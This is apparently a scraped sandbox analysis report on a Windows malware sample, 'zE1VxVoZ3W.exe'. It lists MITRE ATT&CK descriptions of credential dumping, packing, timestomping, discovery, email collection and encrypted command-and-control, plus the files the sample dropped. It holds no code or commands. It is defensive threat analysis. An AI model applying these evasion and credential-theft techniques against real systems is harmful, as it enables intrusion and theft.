Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zE1VxVoZ3W.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ydRhqlPsLsIczR.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zE1VxVoZ3W.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\62MfV68M

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xl0hwyu.f3c.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dyx5xts.j0y.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epniggks.0in.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjsredis.24b.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4fzlmvq.4ri.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pskss2jq.fma.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tehc42ap.mra.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtt0uvyv.ulu.ps1

C:\Users\user\AppData\Local\Temp\tmp7D49.tmp

Windows Analysis Report
zE1VxVoZ3W.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre